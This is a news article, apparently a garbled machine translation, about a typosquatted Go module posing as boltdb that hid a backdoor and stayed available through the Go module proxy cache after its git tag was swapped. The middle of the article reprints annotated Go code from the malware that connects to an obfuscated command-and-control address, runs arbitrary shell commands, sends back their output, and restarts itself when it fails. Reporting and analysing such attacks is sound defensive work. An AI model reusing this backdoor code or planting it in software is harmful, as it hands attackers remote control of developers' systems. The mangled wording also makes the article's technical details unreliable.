In the ecosystem of Go programming language, socket researchers have discovered a malignant typo quatiting package that pretends to be a boltadby module. This package has a back door for the remote code version and uses Go module mirror service to stay in cache. At the same time, the GIT tag was replaced to hide the malware from the manual check.
Advertisement
The theme of Type Quatting is not new: In recent years, Pyypi and NPM package managers have always had incidents in which the malis code was hidden in packages with equally sound names, such as cheating popular libraries. Download and download it to woo it. Malignant package.
Cheating through Typo Kwating in Go Ecosystem
In the current case, an attacker developed a malignant go package called Boltadbi-Go/Bolt, which looks misleading the same as a broad and legitimate boltdby package. After the malignant package was intercepted by the Go module proxy, the attacker replaced the guit tag in the source repository, so that they mention a clean, legitimate version. As a result, the malignant version was available for developers who used proxy, even if they manually examine the zethab repository.
A deadly Code example from blog post from socket Using the comments, shows how the attacker has worked in the DB.GO file while installing and activating a hidden back door:
func ApiInit() {
go func() {
defer func() {
// Persistence mechanism:
// If the function panics (e.g. connection loss),
// restart after 30 seconds
if r := recover(); r != nil {
time.Sleep(30 * time.Second)
ApiInit()
}
}()
for {
d := net.Dialer{Timeout: 10 * time.Second}
// Obfuscated C2 connection:
// Constructs a hidden IP address and port using _r()
conn, err := d.Dial("tcp",
_r(strconv.Itoa(MaxMemSize)
+ strconv.Itoa(MaxIndex) + ":"
+ strconv.Itoa(MaxPort)))
if err != nil {
// Stealth:
// If the connection fails, retry in
// 30 seconds to avoid immediate detection
time.Sleep(30 * time.Second)
continue
}
// Remote command execution loop
// Reads incoming commands and executes them
for {
message, _ := bufio.NewReader(conn).ReadString('\n')
args, err := shellwords.Parse(strings.TrimSuffix(message,
"\n"))
if err != nil {
fmt.Fprintf(conn, "Parse err: %s\n", err)
continue
}
// Execution of arbitrary shell commands
var out ()byte
if len(args) == 1 {
out, err = exec.Command(args(0)).Output()
} else {
out, err = exec.Command(args(0), args(1:)...).Output()
}
// Exfiltration:
// Sends the command output or error back
// to the threat actor
if err != nil {
fmt.Fprintf(conn, "%s\n", err)
}
fmt.Fprintf(conn, "%s\n", out)
}
}
}()
}Go module irreversible
The Go module is designed in such a way that they are irreversible after their publication. This means that all users who download a certain version of a module always receive the same data. The objective is to ensure the integrity and fertility of the build by stopping secret changes after publication or preventing the transit.
Although the attackers can take advantage of irreversible to keep harmful codes permanently in cache, this property is a significant safety benefit as it increases confidence in the stability of the module.
Hidden back door and how it works
The malignant package boltdb-g/bolt is equipped with a rear door that establishes a connection with a distant C2 server. This connection enables attackers to send and carry commands to the infected system, which means they can take control of the system. Through a Central C2 server (command-end-control server), attackers communicate with the system signed to send instructions and obtain data.
Code C2 uses viling techniques to hide the IP address of the server, which is difficult to detect. The back door is activated when some tasks are used in the package. It remains active, even if it crashes as it has an automatic restart function.
Security measures and future challenges
The incident suggests that the mechanism for package distribution in Go-ecosystem can also be abused for attacks. Therefore, developers should be particularly cautious and before installing the integrity of the packages should be thoroughly examined. According to blog post It is particularly important to examine dependence on discrepancies and use advanced safety equipment that analyze the installed code.
To make the GO module ecosystem more resistant to such attacks, there is a requirement of increased awareness about increase in safety measures and potential hazards.
further information Provides blog post from socket,
(MDO)
